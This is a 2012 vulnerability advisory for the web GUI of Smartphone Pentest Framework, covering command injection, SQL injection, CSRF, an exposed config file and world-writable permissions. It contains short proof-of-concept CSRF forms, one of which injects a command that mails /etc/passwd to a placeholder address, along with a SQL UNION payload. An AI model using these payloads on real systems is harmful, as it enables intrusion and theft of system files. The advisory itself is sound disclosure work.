Multiple Vulnerabilities in Smartphone Pentest Framework (SPF)

2012-11-1800:00:00

vulners.com

Advisory ID: HTB23123
Product: Smartphone Pentest Framework (SPF)
Vendor: Bulb Security LLC
Vulnerable Version(s): v0.1.2 and probably prior
Tested Version: v0.1.2
Vendor Notification: October 24, 2012
Public Disclosure: November 14, 2012
Vulnerability Type: OS Command Injection [CWE-78], SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352], Improper Access Control [CWE-284], Incorrect Default Permissions [CWE-276]
CVE References: CVE-2012-5693, CVE-2012-5694, CVE-2012-5695, CVE-2012-5696, CVE-2012-5697
CVSSv2 Base Scores: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C), 5.8 (AV:A/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 3.3 (AV:A/AC:L/Au:N/C:P/I:N/A:N), 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Risk Level: High
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine. The research was inspired by the vulnerability found by Jon Passki
(http://osvdb.org/85873).

Even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for many pentesters) the vulnerabilities can still be easily exploited via the local/internal network, or even from remote via CSRF vector. In default installation of SPF the web server port and GUI application's path are easily predictable (localhost:80/frameworkgui/).

1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)

Multiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the system() function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server.

Vulnerable scripts and parameters:

remoteAttack.pl:
"ipAddressTB" HTTP POST parameter.
CSAttack.pl:
"hostingPath", "filename" and "phNo2Attack" HTTP POST parameters.
SEAttack.pl:
"hostingPath", "platformDD2", "fileName" and "phNo2Attack" HTTP POST parameters.
attach2agents.pl:
"agentURLPath" and "agentControlKey" HTTP POST parameters.
attachMobileModem.pl:
"appURLPath" and "controlKey" HTTP POST parameters.
guessPassword.pl:
"ipAddressTB" HTTP POST parameter.

PoCs (Proof-of-Concept) below will send "/etc/passwd" file to the "user@host" email address:

All of the above-mentioned vulnerabilities can be exploited via CSRF vector. The PoC below sends "/etc/passwd" file to the "user@host" email address as soon as victim [that has open SPF GUI in one tab of a browser] visits a malicious web page with CSRF exploit:

<form action="http://localhost/frameworkgui/guessPassword.pl" method="post" name=f1>
<input type="hidden" name="ipAddressTB" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

2) Multiple SQL Injections in Smartphone Pentest Framework (SPF)

Multiple Perl scripts in the "/frameworkgui/" directory are vulnerable to SQL injections. A remote attacker can execute arbitrary SQL commands in application's database.

Vulnerable scripts and parameters:

attach2Agents.pl:
"agentPhNo", "controlPhNo", "agentURLPath", "agentControlKey" and "platformDD1" HTTP POST parameters.
attachMobileModem.pl:
"modemPhoneNo", "controlKey" and "appURLPath" HTTP POST parameters.
escalatePrivileges.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
getContacts.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
getDatabase.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
SEAttack.pl:
"modemNoDD" HTTP POST parameter
sendSMS.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
takePic.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
CSAttack.pl:
"modemNoDD2" HTTP POST parameter.

The following PoC is available:

All the above-mentioned SQL injections can also be exploited via CSRF vector:

<form action="http://localhost/cgi-bin/frameworkgui/attach2Agents.pl" method="post" name=f1>
<input type="hidden" name="agentPhNo" value="-1 UNION SELECT version() INTO OUTFILE 'file.txt'" />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit();
</script>

3) Cross-Site Request Forgery in Smartphone Pentest Framework (SPF)

The vulnerability exists due to insufficient verification of the HTTP requests origin in all Perl scripts within the "/frameworkgui/" directory. A remote attacker without direct access to application's web interface can perform cross-site request forgery attacks and execute arbitrary actions available to application's users only (e.g. send SMS messages).

However, in our case the most practical usage of the CSRF vulnerabilities is to exploit OS command injection and SQL injection vulnerabilities described in sections 1) and 2) of this advisory.

A Social Engineering attack scenario may be quite simple:
Step 1: Send link to your friend to "a brilliant pentester's framework".
Step 2: The majority of people will make a default installation of the SPF.
Step 3: Send link to "SPF practical usage" manual with CSRF exploit to your friend.
Step 4: With a bit of luck you can execute arbitrary commands on your friend's machine.

4) Improper Access Control in Smartphone Pentest Framework (SPF)

The weakness exists due to insufficient ACL to the "config" file located in "/frameworkgui/" directory. A remote attacker can access the configuration file directly and obtain sensitive information, such as database password that is stored in plaintext.

PoC:

http://[host]/frameworkgui/config

5) Incorrect Default Permissions in Smartphone Pentest Framework (SPF)

The weakness exists because of "btinstall" installation script that sets world-writable permissions for all files within the "/frameworkgui/" directory:

cd /var/www/frameworkgui; chmod 777 * ;

A local unprivileged user can read and modify arbitrary files located within this directory.
Further exploitation of this vulnerability might allow an attacker to place or inject into existing Perl scripts a backdoor and even gain full control over the system under certain conditions.

Solution:

It is strongly recommended to remove the SPF's web GUI from your system as soon as possible, as it is not longer supported by vendor.

Vendor original response (October 24, 2012):
"I'm taking the GUI out of the project entirely for the time being so that will be the short term patch. DARPA wanted there to be a gui but obviously having a webbased gui was a terrible idea. Feel free to release whatever you want about it, everybody else does."

Vendor final response (November 8, 2012):
"The product in question doesnt even exist anymore. So I don't know what you want me to say about it being patched. It was just a proof of concept. Not a product at all. And since clearly it wasnt good enough for primetime I removed it from github. Say whatever you want about it."

References:

[1] High-Tech Bridge Advisory HTB23123 - https://www.htbridge.com/advisory/HTB23123 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).
[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.